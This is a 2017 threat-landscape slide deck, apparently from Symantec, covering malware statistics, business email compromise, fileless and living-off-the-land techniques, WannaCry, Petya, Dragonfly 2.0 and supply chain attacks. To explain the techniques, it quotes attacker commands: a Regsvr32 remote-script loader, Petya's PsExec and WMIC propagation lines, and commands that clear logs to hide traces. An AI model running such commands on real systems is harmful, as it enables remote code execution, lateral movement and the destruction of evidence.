Upload
symantec-security-response
View
1.340
Download
0
Embed Size (px)
Citation preview
Presenter Date
Threat Landscape Q2 / 2017 Update
Asim Rab
Candid Wueest
Sept 2017
2Copyright © 2017 Symantec Corporation
General trends
Simple, but successful
o Low-tech attacks (BEC)
o Living off the land and fileless
o Emails with social engineering
Focused and selective
o More ransomware in corporations
o Selective spreading of malware
o Attacking supply chain companies
3Copyright © 2017 Symantec Corporation
o More than 2 Million new malware variants per day
o Script malware leads to many variants
Malware statisticsRegion % of global
USA 27.26%
Japan 6.49%
China 6.04%
India 5.82%
Brazil 4.12%
Germany 3.97%
Great Britain 3.59%
Canada 2.65%
France 2.55%
Russia 2.32%
Australia 2.17%
Italy 2.03%
Mexico 1.67%
South Korea 1.34%
Turkey 1.28%
Netherlands 1.27%
Spain 1.26%
Indonesia 1.11%
Poland 1.08%
Taiwan 0.90%
0.0
10.0
20.0
30.0
40.0
50.0
60.0
70.0
80.0
90.0
100.0
January February March April May June July August
New
malware
variants per
month in
millions
4Copyright © 2017 Symantec Corporation
Web attacks still elevated
0
200,000
400,000
600,000
800,000
1,000,000
1,200,000
1,400,000
January February March April May June July August
o Normally no 0-days exploits used
o RIG toolkit is most active
o Link spread by email or advertisement
o Sometimes infections are restricted to specific IP addresses
o Supply chain attacks increased
Web attacks blocked per day
5Copyright © 2017 Symantec Corporation
Malicious doc containing macro with social engineering
Malicious documents still common
5
Embedded binary can be double clicked
6Copyright © 2017 Symantec Corporation
o More than half of the malicious attachments are script files
o Macros or JavaScript are usually downloading final payload
o Most common payloads are ransomware and financial Trojans
Emaile.g. invoice or receipt
Attachmente.g. JavaScript
Downloader e.g. PowerShell
Payload e.g. Ransomware
Whitepaper available
7Copyright © 2017 Symantec Corporation
Section
Business Email Compromise (BEC)2
8Copyright © 2017 Symantec Corporation
4.3
6.8
4.5 5.1
5.9 4.6
0.0
1.0
2.0
3.0
4.0
5.0
6.0
7.0
8.0
Jan Feb Mar Apr May Jun
BEC email received per targeted organization
Low-tech attacks: Business email compromise
o Spear-phishing taken to the next level
o Convince the company to perform a payment transaction
o Scams often use typo-squatted domains
o Some attacks change the IBAN in invoices
o Exposed losses Oct 2013 – Dec 2016 was over $5bn
o 8,000 businesses targeted monthly
9Copyright © 2017 Symantec Corporation
Create a sense of urgency, requiring immediate action, attempting to pressure the recipient into action
BEC subject lines
Top three subjects
feature in 2/3 of all
emails
PAYMENT
URGENT
REQUEST
10Copyright © 2017 Symantec Corporation
Section
Living off the land
3
Whitepaper available
11Copyright © 2017 Symantec Corporation
When attackers turn what you have against youo Fewer new files on disk
o more difficult to detect attack, no IoC to share
o Use off-the-shelf tools & cloud services
o difficult to determine intent & source
o These tools are ubiquitous
o hiding in plain sight
o Finding exploitable zero-day vulnerabilities is getting more difficult
o use simple and proven methods such as email & social engineering
Living off the land
11
12Copyright © 2017 Symantec Corporation
Multiple fileless options exist but not all are truly fileless
Fileless attacks
e.g. remote code exploits such as EternalBlue and CodeRedMemory only attacks
Fileless loadpoint
Non-PE files
Dual-use tools
Documents containing macros, PDFs with JavaScript and scripts
(VBS, JavaScript, PowerShell,…)
Hiding scripts in the registry, WMI or GPO, e.g. Poweliks and Kotver
Using benign tools, such as PsExec, to do malicious things
13Copyright © 2017 Symantec Corporation
Living off the land attack chain
Exploit in memorye.g. SMB EternalBlue
Email with Non-PE filee.g. document macro
Weak or stolen credentialse.g. RDP password guess
Incursion
Remote script dropper e.g. LNK with PowerShell from cloud
Memory only malwaree.g. SQL Slammer
Non-persistent
Persistent
Persistence
Fileless persistence loadpointe.g. JScript in registry
Traditional methods
Payload
Regular non-fileless payload
Non-PE file payloade.g. PowerShell script
Memory only payloade.g. Mirai DDoS
Dual-use toolse.g. netsh or PsExec.exe
14Copyright © 2017 Symantec Corporation
o Scripts are very common, especially PowerShell
o Many script toolkits available, e.g. PS Empire
o Scripts are easy to obfuscate and difficult to detect with signatures
o Scripts are flexible and can be adapted quickly
Non-PE filesWhitepaper available
15Copyright © 2017 Symantec Corporation
Fileless loadpoints
o Registry run key can point to a remote SCT file
o Regsvr32 will download and execute the embedded JScript
Regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll
Downloder.Dromedan (40,000 detections per day)
o Embedded JScript uses WMI to execute a PowerShell payload
o Script stores encoded DLL in the registry for later use
Example: Remote SCT load
Malicious.sct file
16Copyright © 2017 Symantec Corporation
Section
Ransomware
4
Whitepaper available
17Copyright © 2017 Symantec Corporation
Ransomware stats
o Ransomware is still profitable and common
o Multiple self-propagating variants appeared
010,00020,00030,00040,00050,00060,00070,00080,00090,000
Ja
n-1
6
Fe
b-1
6
Ma
r-1
6
Ap
r-1
6
Ma
y-1
6
Ju
n-1
6
Ju
l-1
6
Aug-1
6
Se
p-1
6
Oct-
16
No
v-1
6
De
c-1
6
Ja
n-1
7
Fe
b-1
7
Ma
r-1
7
Ap
r-1
7
Ma
y-1
7
Ju
n-1
7
Trend Line
Other Countries
31%
United States29%
Japan9%
Italy8%
India4%
Germany4%
Netherlands3%
UK3%
Australia3%
Russia3%
Canada3%
18Copyright © 2017 Symantec Corporation
o 42% of ransomware infections in 2017 were in enterprises o Due to WannaCry and Petya
o Attacks against cloud storage increased
Ransomware in enterprises
0
10,000
20,000
30,000
40,000
50,000
60,000
Jan-16 Feb-16 Mar-16 Apr-16 May-16 Jun-16 Jul-16 Aug-16 Sep-16 Oct-16 Nov-16 Dec-16 Jan-17 Feb-17 Mar-17 Apr-17 May-17 Jun-17
Consumer Enterprise
19Copyright © 2017 Symantec Corporation
o 1 Billion EternalBlue infection attempts blocked
o Profit $140K, Bitcoin accounts emptied August 3rd
o Linked to Lazarus group
WannaCry
0
20000
40000
60000
80000
100000
120000
21Copyright © 2017 Symantec Corporation
o Petya (June variant) classified as a wiper
o Semi-targeted infections through supply chain hack (MEDoc)
o Profit $10K, Bitcoin account emptied July 4th
Petya
0
20
40
60
80
100
120
140
160
22Copyright © 2017 Symantec Corporation
o Threat is a DLL executed by rundll32.exe
o Uses recompiled version of LSADump Mimikatz to get passwords
o Uses PsExec to propagate
o \\[server_name]\admin$\perfc.dat
o psexec rundll32.exe c:\windows\perfc.dat #1 [RANDOM]
o Uses WMI to propagate if PsExec failso wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create
“%System%\rundll32.exe \“%Windows%\perfc.dat\" #1 60”
o Scheduled task to restart into the malicious MBR payloado schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR “%system%\shutdown14:42.exe /r /f" /ST
o Deletes log files to hide traceso wevtutil cl Setup & wevtutil cl System & … & fsutil usn deletejournal /D %C:
Petya uses dual-use tools
23Copyright © 2017 Symantec Corporation
Section
Targeted attack groups
5
24Copyright © 2017 Symantec Corporation
o Active since December 2015 in Europe and North America
o Ongoing attacks against energy sector, mainly in Turkey and U.S.
Infiltrationo Compromised websites and spear phishing (Phishery toolkit)
o Trojanized software, using Shelter evasion framework
o Various backdoors:
Dragonfly 2.0
• Trojan.Listrix
• Trojan.Credrix
• Backdoor.Goodor
• Backdoor.Dorshell
• Trojan.Karagany.B
• Trojan.Heriplor
Slide deck available
25Copyright © 2017 Symantec Corporation
o Uses living off the land tacticso PowerShell, PsExec, and BITSAdmin
o Phisherly toolkit became available on GitHub in 2016o Document used SMB template link to leak credentials
o Screenutil and Shelter are available online
Goalo Information stealing: passwords, documents and screenshots
o Potential for sabotage attacks
Dragonfly 2.0
26Copyright © 2017 Symantec Corporation
o Many cases where legitimate software was compromised
o Fast and semi-targeted distribution through update process
o Trojanized updates are difficult to discovero Trusted domain, digitally signed, trusted update process,…
Examples:o MEdoc (Petya June/2017)o CCleaner (Aug/2017)o Python modules (Sept/2017)o ICS supplier (Dragonfly 2014)
Supply chain attacks increasing
27Copyright © 2017 Symantec Corporation
o Cybercriminals are focusing on simple but effective methods
o Ransomware is still very prevalent
o Living off the land tactics are increasingly used
o Often targeted infections with limited distribution
Summary